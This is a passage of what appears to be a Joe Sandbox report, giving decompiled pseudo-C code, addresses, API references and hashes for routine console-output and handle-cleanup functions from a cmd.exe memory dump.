							_t137->i();
							goto L27;
						} else {
							_t83 = E011DD7D4( *(_t136 + 0x38), 0x2a);
							__eflags = _t83;
							if(_t83 != 0) {
								goto L25;
							}
							_t39 = _t83 + 0x3f; // 0x3f
							_t84 = E011DD7D4( *(_t136 + 0x38), _t39);
							__eflags = _t84;
							if(_t84 != 0) {
								goto L25;
							}
							_t131 = _a552;
							__eflags = _a552;
							if(__eflags == 0) {
								_t131 =  &_a32;
							}
							_t85 = E011E10B0(_t136, _t131, __eflags, _a560);
							__eflags = _t85 - 2;
							if(_t85 != 2) {
								goto L25;
							} else {
								__eflags =  *(_t136 + 0x34);
								if( *(_t136 + 0x34) == 0) {
									L61:
									_t86 = _a552;
									__eflags = _t86;
									if(__eflags == 0) {
										_t86 =  &_a32;
									}
									_t126 =  *_t102;
									_push(_t86);
									_push(_t102[1]);
									_t87 = E011E1F52(_t102, _t136,  *_t102, _t132, _t136, __eflags);
									__eflags = _t87;
									if(_t87 != 0) {
										goto L71;
									} else {
										_t136 = 0;
										_a12 = 1;
										_a8 = 0;
										goto L28;
									}
								} else {
									_t126 = _t136;
									_t88 = E011F76C0(_a24, _t136);
									__eflags = _t88;
									if(_t88 != 0) {
										L71:
										__imp__??_V@YAXPAX@Z(_a544);
										_t140 = _t140 + 4;
										_t57 = 1;
										goto L32;
									}
									goto L61;
								}
							}
						}
					}
				} else {
					L41:
					_t136 = _a16;
					L29:
					if( *0x1213cc4 != _t102) {
						L78:
						_t57 = _t136;
						goto L32;
					} else {
						_t132 = _a20;
						_t126 = _a24;
						L1:
						if( *0x11fd544 != 0) {
							E011F921A(_t102, _t132);
							_t126 = _a24;
						}
						 *0x11fd590 = 0;
						if( *0x1213cc9 == 0 || _t132 == 0) {
							goto L4;
						} else {
							goto L33;
						}
					}
				}
				L4:
				_t133 = E011E0662(_t102);
				if(_t133 == 0xffffffff) {
					goto L73;
				}
				_t59 = E011DEEF0(3, _t133, _t102[4]);
				_t136 = _t59;
				__imp___tell(_t133);
				_t102[2] = _t59;
				_t142 = _t140 + 4;
				_t3 = _t133 - 3; // -3
				_t108 = 0;
				_t126 = _t133;
				if(_t3 > 0x5b) {
					L8:
					__imp___close(_t133);
					_t140 = _t142 + 4;
					if(_t136 == 0) {
						goto L41;
					}
					if(_t136 == 1 ||  *0x120f980 == 0x234a) {
						E011F82EB(_t108);
						__eflags =  *0x11fd0c8 - 1;
						if( *0x11fd0c8 == 1) {
							__eflags =  *0x1218530;
							if( *0x1218530 == 0) {
								E011F6FF0(_t108);
								E011DC108(_t108, 0x2371, 1, 0x1203892);
								_t140 = _t140 + 0xc;
							}
						}
						E011F9287(_t108);
						__imp__longjmp(0x120b8b8, 1);
						goto L78;
					} else {
						if(_t136 == 0xffffffff) {
							_t57 = _a16;
							goto L32;
						} else {
							_t132 = _a20;
							_t126 = _a28;
							goto L13;
						}
					}
				}
				if(_t133 > 0x1f) {
					_t44 = _t133 - 0x20; // -32
					_t100 = 1 + (_t44 >> 5);
					__eflags = _t100;
					_t108 = _t100;
					do {
						_t126 = _t126 - 0x20;
						_t100 = _t100 - 1;
						__eflags = _t100;
					} while (_t100 != 0);
				}
				asm("btr eax, edx");
				goto L8;
			}































                                    0x011de5a8
                                    0x011de5a8
                                    0x011de5a8
                                    0x011de5a8
                                    0x011de7ad
                                    0x011de7b0
                                    0x011de7b4
                                    0x00000000
                                    0x00000000
                                    0x011de7c4
                                    0x011de7c6
                                    0x011de7c8
                                    0x011ebfc5
                                    0x011ebfc5
                                    0x011de798
                                    0x011de79f
                                    0x011de7a0
                                    0x011de7a1
                                    0x011de7a2
                                    0x011de7ac
                                    0x011de7ac
                                    0x011de7d3
                                    0x011de7d9
                                    0x011de7de
                                    0x011de7e1
                                    0x011de7e3
                                    0x00000000
                                    0x00000000
                                    0x011de7f0
                                    0x011de7f5
                                    0x011de7f8
                                    0x011de7fa
                                    0x00000000
                                    0x00000000
                                    0x011de805
                                    0x011de80a
                                    0x011de80d
                                    0x011de814
                                    0x011de667
                                    0x011de669
                                    0x011de81d
                                    0x011de81f
                                    0x011de827
                                    0x011de827
                                    0x011de81f
                                    0x011de66f
                                    0x011de673
                                    0x011de684
                                    0x011de832
                                    0x011de836
                                    0x011de68a
                                    0x011de691
                                    0x011de693
                                    0x011de89d
                                    0x011de89f
                                    0x011de8a2
                                    0x011ebebb
                                    0x011ebec2
                                    0x011ebec4
                                    0x011ebeca
                                    0x011ebecf
                                    0x011ebed3
                                    0x011ebedd
                                    0x011ebee2
                                    0x011ebee4
                                    0x011ebee4
                                    0x011ebec4
                                    0x011de8a2
                                    0x011de693
                                    0x011de69c
                                    0x011de846
                                    0x011de846
                                    0x011de6ab
                                    0x011de6b9
                                    0x011de6c1
                                    0x011de6cc
                                    0x011de6d1
                                    0x011de6dc
                                    0x011ebeec
                                    0x011de6e2
                                    0x011de6e2
                                    0x011de6e2
                                    0x011de6f3
                                    0x011ebfc0
                                    0x00000000
                                    0x011de6f9
                                    0x011de6fb
                                    0x011ebef6
                                    0x011ebef8
                                    0x011de76b
                                    0x011de772
                                    0x011de778
                                    0x00000000
                                    0x011de778
                                    0x011de704
                                    0x011de721
                                    0x011de721
                                    0x011de72d
                                    0x011de731
                                    0x011de736
                                    0x011de742
                                    0x011de747
                                    0x011de74d
                                    0x011de755
                                    0x011ebf4d
                                    0x011ebf52
                                    0x011ebf55
                                    0x011ebf72
                                    0x011ebf72
                                    0x011ebf74
                                    0x011ebf82
                                    0x011ebf84
                                    0x011ebf84
                                    0x011ebf8a
                                    0x011ebf8a
                                    0x011ebf8c
                                    0x00000000
                                    0x00000000
                                    0x011ebf97
                                    0x011de767
                                    0x011de767
                                    0x00000000
                                    0x011de767
                                    0x011ebf5c
                                    0x011ebf62
                                    0x011ebf68
                                    0x011ebf6d
                                    0x011ebf70
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011ebf70
                                    0x011de75b
                                    0x011de75f
                                    0x011de765
                                    0x00000000
                                    0x011de84e
                                    0x011de856
                                    0x011de85b
                                    0x011de85d
                                    0x00000000
                                    0x00000000
                                    0x011de866
                                    0x011de869
                                    0x011de86e
                                    0x011de870
                                    0x00000000
                                    0x00000000
                                    0x011de876
                                    0x011de87d
                                    0x011de87f
                                    0x011de8ad
                                    0x011de8ad
                                    0x011de88a
                                    0x011de88f
                                    0x011de892
                                    0x00000000
                                    0x011de898
                                    0x011ebf01
                                    0x011ebf05
                                    0x011ebf1a
                                    0x011ebf1a
                                    0x011ebf21
                                    0x011ebf23
                                    0x011ebf25
                                    0x011ebf25
                                    0x011ebf29
                                    0x011ebf2d
                                    0x011ebf2e
                                    0x011ebf31
                                    0x011ebf36
                                    0x011ebf38
                                    0x00000000
                                    0x011ebf3a
                                    0x011ebf3a
                                    0x011ebf3c
                                    0x011ebf44
                                    0x00000000
                                    0x011ebf44
                                    0x011ebf07
                                    0x011ebf0b
                                    0x011ebf0d
                                    0x011ebf12
                                    0x011ebf14
                                    0x011ebfa2
                                    0x011ebfa9
                                    0x011ebfaf
                                    0x011ebfb2
                                    0x00000000
                                    0x011ebfb2
                                    0x00000000
                                    0x011ebf14
                                    0x011ebf05
                                    0x011de892
                                    0x011de704
                                    0x011de83d
                                    0x011de83d
                                    0x011de83d
                                    0x011de77b
                                    0x011de781
                                    0x011ec011
                                    0x011ec011
                                    0x00000000
                                    0x011de787
                                    0x011de787
                                    0x011de78b
                                    0x011de5b0
                                    0x011de5b7
                                    0x011ebe97
                                    0x011ebe9c
                                    0x011ebe9c
                                    0x011de5c4
                                    0x011de5cb
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011de5cb
                                    0x011de781
                                    0x011de5d5
                                    0x011de5dc
                                    0x011de5e1
                                    0x00000000
                                    0x00000000
                                    0x011de5f1
                                    0x011de5f7
                                    0x011de5f9
                                    0x011de5ff
                                    0x011de602
                                    0x011de605
                                    0x011de608
                                    0x011de60a
                                    0x011de60f
                                    0x011de62b
                                    0x011de62c
                                    0x011de632
                                    0x011de637
                                    0x00000000
                                    0x00000000
                                    0x011de640
                                    0x011ebfcf
                                    0x011ebfd4
                                    0x011ebfdb
                                    0x011ebfdd
                                    0x011ebfe4
                                    0x011ebfe6
                                    0x011ebff7
                                    0x011ebffc
                                    0x011ebffc
                                    0x011ebfe4
                                    0x011ebfff
                                    0x011ec00b
                                    0x00000000
                                    0x011de656
                                    0x011de659
                                    0x011de794
                                    0x00000000
                                    0x011de65f
                                    0x011de65f
                                    0x011de663
                                    0x00000000
                                    0x011de663
                                    0x011de659
                                    0x011de640
                                    0x011de614
                                    0x011ebea5
                                    0x011ebeab
                                    0x011ebeab
                                    0x011ebeac
                                    0x011ebeae
                                    0x011ebeae
                                    0x011ebeb1
                                    0x011ebeb1
                                    0x011ebeb1
                                    0x011ebeb6
                                    0x011de621
                                    0x00000000

                                    APIs
                                    • _tell.MSVCRT ref: 011DE5F9
                                    • _close.MSVCRT ref: 011DE62C
                                    • memset.MSVCRT ref: 011DE6CC
                                    • GetConsoleOutputCP.API-MS-WIN-CORE-CONSOLE-L1-1-0(00007FE7), ref: 011DE736
                                    • GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,01203840), ref: 011DE747
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011DE772
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: ConsoleInfoOutput_close_tellmemset
                                    • String ID:
                                    • API String ID: 1380661413-0
                                    • Opcode ID: 7c9ce815e34ec76f5b68321474e989b27e75f4b7abf43dc1482f8475a50fef48
                                    • Instruction ID: 1e04259f300a00a2ba5e78bc717ddac8be1921d31cde062bcb5a87e7d41ca4f4
                                    • Opcode Fuzzy Hash: 7c9ce815e34ec76f5b68321474e989b27e75f4b7abf43dc1482f8475a50fef48
                                    • Instruction Fuzzy Hash: 02411A30A057018BDB3DDF9CE45C72ABBE2AF84319F14052CD9559B2E5DB709885CB47
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011E2616, Relevance: 9.1, APIs: 6, Instructions: 90COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 19%
                                    			E011E2616(long __ecx, DWORD* __edx) {
				void _v8;
				void* _t4;
				long _t5;
				int _t21;
				long _t43;

				_push(__ecx);
				_t40 = __edx;
				_t43 = 0;
				if(__edx <= 0) {
					L5:
					_t5 = _t43;
					L6:
					return _t5;
				}
				if(E011E269C(_t4) != 0) {
					__imp__AcquireSRWLockShared(0x1217f20);
					_t7 =  &_v8;
					__imp___get_osfhandle(0);
					_t21 = WriteConsoleW( &_v8, 1, __ecx, __edx, _t7);
					if(_t21 == 0) {
						_t43 = GetLastError();
					}
					__imp__ReleaseSRWLockShared(0x1217f20);
				} else {
					_t40 = __edx + __edx;
					_t21 = E011E27C8( &_v8, __ecx, _t40,  &_v8);
				}
				if(_t21 == 0 || _v8 != _t40) {
					_t43 = GetLastError();
					if(_t43 == 0) {
						_t43 = 0x70;
					}
					if(E011E0178(_t10) == 0) {
						if(E011F9953(_t11, 1) == 0) {
							E011F985A(_t43);
						} else {
							_push(0);
							_push(0x2364);
							E011DC5A2(1);
						}
						_t5 = 1;
						goto L6;
					} else {
						_push(0);
						_push(0x1d);
						E011DC5A2(1);
						goto L5;
					}
				} else {
					goto L5;
				}
			}








                                    0x011e261b
                                    0x011e261f
                                    0x011e2621
                                    0x011e2627
                                    0x011e2659
                                    0x011e2659
                                    0x011e265b
                                    0x011e2661
                                    0x011e2661
                                    0x011e2633
                                    0x011e2667
                                    0x011e266f
                                    0x011e2677
                                    0x011e2685
                                    0x011e2689
                                    0x011ed681
                                    0x011ed681
                                    0x011e2694
                                    0x011e2635
                                    0x011e2638
                                    0x011e2646
                                    0x011e2646
                                    0x011e264a
                                    0x011ed68e
                                    0x011ed692
                                    0x011ed696
                                    0x011ed696
                                    0x011ed6a3
                                    0x011ed6be
                                    0x011ed6d2
                                    0x011ed6c0
                                    0x011ed6c0
                                    0x011ed6c2
                                    0x011ed6c7
                                    0x011ed6cd
                                    0x011ed6d7
                                    0x00000000
                                    0x011ed6a5
                                    0x011ed6a5
                                    0x011ed6a7
                                    0x011ed6a9
                                    0x00000000
                                    0x011ed6af
                                    0x00000000
                                    0x00000000
                                    0x00000000

                                    APIs
                                      • Part of subcall function 011E269C: _get_osfhandle.MSVCRT ref: 011E26A7
                                      • Part of subcall function 011E269C: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,011DC5F8,?,?,?), ref: 011E26B6
                                      • Part of subcall function 011E269C: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,?,?,?,?,?,?,?,?,?,?,?,?,?,?,011DC5C6), ref: 011E26D2
                                      • Part of subcall function 011E269C: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(01217F20,00000002), ref: 011E26E1
                                      • Part of subcall function 011E269C: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 011E26EC
                                      • Part of subcall function 011E269C: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(01217F20,?,?,?,?,?,?,?,?,?,?,?,?,?,?,011DC5C6), ref: 011E26F5
                                    • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(01217F20,00000000,?,?,0120B980,00000002,00000000,?,011E9CA6,%s %s ,?,00000000,00000000), ref: 011E2667
                                    • _get_osfhandle.MSVCRT ref: 011E2677
                                    • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,011E9CA6,%s %s ,?,00000000,00000000), ref: 011E267F
                                    • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(01217F20), ref: 011E2694
                                      • Part of subcall function 011E27C8: _get_osfhandle.MSVCRT ref: 011E27DB
                                      • Part of subcall function 011E27C8: WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(00000000,0120B980,000000FF,011FD620,00002000,00000000,00000000), ref: 011E281C
                                      • Part of subcall function 011E27C8: WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(?,011FD620,-00000001,?,00000000), ref: 011E2831
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: LockShared$_get_osfhandle$AcquireConsoleFileReleaseWrite$ByteCharHandleModeMultiTypeWide
                                    • String ID:
                                    • API String ID: 4057327938-0
                                    • Opcode ID: 748438cf8469d61f7657e911d6be472636f5ec2834d7814663d1cd859f12a45c
                                    • Instruction ID: 82dd1b16d21cdff306abb0ec4e33d0a93c885e6816a1dd55a0f07e385e648846
                                    • Opcode Fuzzy Hash: 748438cf8469d61f7657e911d6be472636f5ec2834d7814663d1cd859f12a45c
                                    • Instruction Fuzzy Hash: BF210B32740B066BEF2C66E97C6DB6A36DCDBA8659F11053DFA0AD6180DF70CC004A61
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011E27C8, Relevance: 9.1, APIs: 6, Instructions: 86fileCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 79%
                                    			E011E27C8(void* __eax, void* __edx, long _a4, DWORD* _a8) {
				void* _v8;
				long _v12;
				long _v16;
				long _t15;
				void* _t17;
				void* _t24;
				DWORD* _t29;
				long _t31;
				long _t32;

				_t31 = _a4;
				_t23 = __edx;
				_v16 = _t31;
				__imp___get_osfhandle(_t24);
				_v8 = __eax;
				if( *0x121805c != 0) {
					return WriteFile(__eax, __edx, _t31, _a8, 0);
				}
				_t29 = _a8;
				while(_t31 > 0x2000) {
					_t15 = WideCharToMultiByte( *0x1203854, 0, _t23, 0x1000, 0x11fd620, 0x2000, 0, 0);
					_v12 = _t15;
					_t23 =  &(_t23[0x1000]);
					_t31 = _t31 - 0x2000;
					if(WriteFile(_v8, 0x11fd620, _t15, _t29, 0) == 0 ||  *_t29 != _v12) {
						L9:
						_t17 = 0;
						L7:
						return _t17;
					} else {
						continue;
					}
				}
				if(_t31 == 0) {
					L6:
					 *_t29 = _v16;
					_t17 = 1;
					goto L7;
				}
				_t5 = WideCharToMultiByte( *0x1203854, 0, _t23, 0xffffffff, 0x11fd620, 0x2000, 0, 0) - 1; // -1
				_t32 = _t5;
				if(WriteFile(_v8, 0x11fd620, _t32, _t29, 0) == 0 ||  *_t29 != _t32) {
					goto L9;
				} else {
					goto L6;
				}
			}












                                    0x011e27d2
                                    0x011e27d5
                                    0x011e27d8
                                    0x011e27db
                                    0x011e27e9
                                    0x011e27ec
                                    0x00000000
                                    0x011ed70d
                                    0x011e27f3
                                    0x011e27f6
                                    0x011ed730
                                    0x011ed747
                                    0x011ed74a
                                    0x011ed74c
                                    0x011ed756
                                    0x011e2850
                                    0x011e2850
                                    0x011e2847
                                    0x00000000
                                    0x011ed767
                                    0x00000000
                                    0x011ed767
                                    0x011ed756
                                    0x011e2805
                                    0x011e283f
                                    0x011e2842
                                    0x011e2846
                                    0x00000000
                                    0x011e2846
                                    0x011e2825
                                    0x011e2825
                                    0x011e2839
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000

                                    APIs
                                    • _get_osfhandle.MSVCRT ref: 011E27DB
                                    • WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(00000000,0120B980,000000FF,011FD620,00002000,00000000,00000000), ref: 011E281C
                                    • WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(?,011FD620,-00000001,?,00000000), ref: 011E2831
                                    • WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,0120B980,?,?,00000000), ref: 011ED70D
                                    • WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(00000000,0120B980,00001000,011FD620,00002000,00000000,00000000,00000000), ref: 011ED730
                                    • WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(?,011FD620,00000000,?,00000000), ref: 011ED74E
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: FileWrite$ByteCharMultiWide$_get_osfhandle
                                    • String ID:
                                    • API String ID: 3249344982-0
                                    • Opcode ID: 2b8ebd5a962cbe2294487688cc4a196402efabeff171a66c39aa2ed5b3fb2c56
                                    • Instruction ID: 4936cec639dff8ee6a99c22ccfc33561d2be85aaf3cdb5d6b5a3f60f827fc540
                                    • Opcode Fuzzy Hash: 2b8ebd5a962cbe2294487688cc4a196402efabeff171a66c39aa2ed5b3fb2c56
                                    • Instruction Fuzzy Hash: 8421B331A84608BBEF358EA5AC0DF6A7BFDEB14751F204169FA04A7184D7B05D40DB94
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011F265F, Relevance: 9.1, APIs: 6, Instructions: 82memorysynchronizationCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 91%
                                    			E011F265F(int* __ecx) {
				void** _v0;
				void* _v8;
				int _t18;
				void** _t29;
				void** _t32;
				void* _t39;
				void* _t42;

				_push(__ecx);
				_t39 = __ecx;
				_t2 = _t39 + 4; // 0x4
				_t29 = _t2;
				_t32 = _t29;
				E011F2D6D(_t32,  &_v8);
				_t18 =  *__ecx - 1;
				 *__ecx = _t18;
				if(_t18 != 0) {
					_t42 = _v8;
					goto L18;
				} else {
					_t33 = __ecx[2];
					if(__ecx[2] != 0) {
						E011F2DB4(_t33);
					}
					_t42 = 0;
					 *(_t39 + 8) = 0;
					_t34 =  *(_t39 + 0xc);
					if( *(_t39 + 0xc) != 0) {
						E011F2DB4(_t34);
					}
					_t35 = _v8;
					 *(_t39 + 0xc) = _t42;
					if(_v8 != 0) {
						E011F2DE9(_t35);
					}
					_t18 = E011F25D6(_t35);
					if(_t18 == 0) {
						_t8 = _t39 + 0x18; // 0x18
						_t32 = _t8;
						E011F170A(_t32);
						if( *(_t39 + 0xc) != _t42 && CloseHandle( *(_t39 + 0xc)) == 0) {
							L10:
							_push(_t32);
							L11:
							_t32 = _v0;
							E011F2D56();
						}
						if( *(_t39 + 8) != _t42 && CloseHandle( *(_t39 + 8)) == 0) {
							goto L10;
						}
						if( *_t29 != _t42 && CloseHandle( *_t29) == 0) {
							goto L10;
						}
						_t18 = RtlFreeHeap(GetProcessHeap(), _t42, _t39);
						L18:
						if(_t42 != 0) {
							_t18 = ReleaseMutex(_t42);
							if(_t18 == 0) {
								_push(_t32);
								goto L11;
							}
						}
					}
				}
				return _t18;
			}










                                    0x011f2664
                                    0x011f2668
                                    0x011f2670
                                    0x011f2670
                                    0x011f2674
                                    0x011f2676
                                    0x011f267d
                                    0x011f2680
                                    0x011f2682
                                    0x011f2718
                                    0x00000000
                                    0x011f2688
                                    0x011f2688
                                    0x011f268d
                                    0x011f268f
                                    0x011f268f
                                    0x011f2694
                                    0x011f2696
                                    0x011f2699
                                    0x011f269e
                                    0x011f26a0
                                    0x011f26a0
                                    0x011f26a5
                                    0x011f26a8
                                    0x011f26ad
                                    0x011f26af
                                    0x011f26af
                                    0x011f26b4
                                    0x011f26bb
                                    0x011f26bd
                                    0x011f26bd
                                    0x011f26c0
                                    0x011f26c8
                                    0x011f26d7
                                    0x011f26d7
                                    0x011f26dd
                                    0x011f26dd
                                    0x011f26e0
                                    0x011f26e0
                                    0x011f26e8
                                    0x00000000
                                    0x00000000
                                    0x011f26f9
                                    0x00000000
                                    0x00000000
                                    0x011f2710
                                    0x011f271b
                                    0x011f271d
                                    0x011f2720
                                    0x011f2728
                                    0x011f272a
                                    0x00000000
                                    0x011f272b
                                    0x011f2728
                                    0x011f271d
                                    0x011f26bb
                                    0x011f2738

                                    APIs
                                      • Part of subcall function 011F2D6D: WaitForSingleObjectEx.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,000000FF,00000000,00000000,00000000,?,011F1838,?), ref: 011F2D7C
                                    • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?,?), ref: 011F26CD
                                      • Part of subcall function 011F2DB4: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00000000,?,011F26A5,?), ref: 011F2DBD
                                      • Part of subcall function 011F2DB4: CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?,?,00000000,?,011F26A5,?), ref: 011F2DC6
                                      • Part of subcall function 011F2DB4: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,?,011F26A5,?), ref: 011F2DDF
                                    • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?), ref: 011F26ED
                                    • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?), ref: 011F26FD
                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?), ref: 011F2709
                                    • RtlFreeHeap.NTDLL(00000000), ref: 011F2710
                                    • ReleaseMutex.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?), ref: 011F2720
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: CloseHandle$ErrorHeapLast$FreeMutexObjectProcessReleaseSingleWait
                                    • String ID:
                                    • API String ID: 2383944720-0
                                    • Opcode ID: 66541a32a584ae4daf0899b296677aaddbc20246ae0d8ccd2d74f64a32118042
                                    • Instruction ID: 80a31ae270d6647d85b80ab13ddfc60267b43e5048c5ec5cad5e65a9cb50fdb9
                                    • Opcode Fuzzy Hash: 66541a32a584ae4daf0899b296677aaddbc20246ae0d8ccd2d74f64a32118042
                                    • Instruction Fuzzy Hash: 7D21A130601516ABDF2DEF6AE86896EBB69FF60714714822DEB0583544DF30D891CB91
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011F6E90, Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 80COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 011DEA40: wcschr.MSVCRT ref: 011DEAB7
                                      • Part of subcall function 011DEA40: iswspace.MSVCRT ref: 011DEB2D
                                      • Part of subcall function 011DEA40: wcschr.MSVCRT ref: 011DEB49
                                      • Part of subcall function 011DEA40: wcschr.MSVCRT ref: 011DEB6D
                                    • _wcsicmp.MSVCRT ref: 011F6EFC
                                    • _wcsicmp.MSVCRT ref: 011F6F1B
                                    • _wcsicmp.MSVCRT ref: 011F6F41
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: _wcsicmpwcschr$iswspace
                                    • String ID: KEYS$LIST$OFF
                                    • API String ID: 3924973218-4129271751
                                    • Opcode ID: 9b0b64ebf699e7cecb5abf8562cd04f01e497797f6b747f59ee6c090cb856c46
                                    • Instruction ID: 1e7c37c61c9c63b0c04d1cd5086850bc3b94e1d06a47020f7c0a798409792fff
                                    • Opcode Fuzzy Hash: 9b0b64ebf699e7cecb5abf8562cd04f01e497797f6b747f59ee6c090cb856c46
                                    • Instruction Fuzzy Hash: 33118C32708712EAA31DEB2EFC698237798FBE4624391801EE703861C6DF215C41C763
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011E6CE1, Relevance: 9.1, APIs: 6, Instructions: 79memorysynchronizationCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 92%
                                    			E011E6CE1(void* __eax) {
				void** _v0;
				void* _v8;
				int _t19;
				void** _t30;
				void* _t32;
				void** _t33;
				void* _t40;
				void* _t43;

				_t32 =  *0x11fd010; // 0x0
				if(_t32 != 0) {
					_push(_t32);
					_t40 = _t32;
					_t2 = _t40 + 4; // 0x4
					_t30 = _t2;
					_t33 = _t30;
					E011F2D6D(_t33,  &_v8);
					_t19 =  *_t40 - 1;
					 *_t40 = _t19;
					if(_t19 != 0) {
						_t43 = _v8;
						goto L20;
					} else {
						_t34 =  *(_t40 + 8);
						if( *(_t40 + 8) != 0) {
							E011F2DB4(_t34);
						}
						_t43 = 0;
						 *(_t40 + 8) = 0;
						_t35 =  *(_t40 + 0xc);
						if( *(_t40 + 0xc) != 0) {
							E011F2DB4(_t35);
						}
						_t36 = _v8;
						 *(_t40 + 0xc) = _t43;
						if(_v8 != 0) {
							E011F2DE9(_t36);
						}
						_t19 = E011F25D6(_t36);
						if(_t19 == 0) {
							_t8 = _t40 + 0x18; // 0x18
							_t33 = _t8;
							E011F170A(_t33);
							if( *(_t40 + 0xc) != _t43 && CloseHandle( *(_t40 + 0xc)) == 0) {
								L12:
								_push(_t33);
								L13:
								_t33 = _v0;
								E011F2D56();
							}
							if( *(_t40 + 8) != _t43 && CloseHandle( *(_t40 + 8)) == 0) {
								goto L12;
							}
							if( *_t30 != _t43 && CloseHandle( *_t30) == 0) {
								goto L12;
							}
							_t19 = RtlFreeHeap(GetProcessHeap(), _t43, _t40);
							L20:
							if(_t43 != 0) {
								_t19 = ReleaseMutex(_t43);
								if(_t19 == 0) {
									_push(_t33);
									goto L13;
								}
							}
						}
					}
					return _t19;
				} else {
					return __eax;
				}
			}











                                    0x011e6ce1
                                    0x011e6ce9
                                    0x011f2664
                                    0x011f2668
                                    0x011f2670
                                    0x011f2670
                                    0x011f2674
                                    0x011f2676
                                    0x011f267d
                                    0x011f2680
                                    0x011f2682
                                    0x011f2718
                                    0x00000000
                                    0x011f2688
                                    0x011f2688
                                    0x011f268d
                                    0x011f268f
                                    0x011f268f
                                    0x011f2694
                                    0x011f2696
                                    0x011f2699
                                    0x011f269e
                                    0x011f26a0
                                    0x011f26a0
                                    0x011f26a5
                                    0x011f26a8
                                    0x011f26ad
                                    0x011f26af
                                    0x011f26af
                                    0x011f26b4
                                    0x011f26bb
                                    0x011f26bd
                                    0x011f26bd
                                    0x011f26c0
                                    0x011f26c8
                                    0x011f26d7
                                    0x011f26d7
                                    0x011f26dd
                                    0x011f26dd
                                    0x011f26e0
                                    0x011f26e0
                                    0x011f26e8
                                    0x00000000
                                    0x00000000
                                    0x011f26f9
                                    0x00000000
                                    0x00000000
                                    0x011f2710
                                    0x011f271b
                                    0x011f271d
                                    0x011f2720
                                    0x011f2728
                                    0x011f272a
                                    0x00000000
                                    0x011f272b
                                    0x011f2728
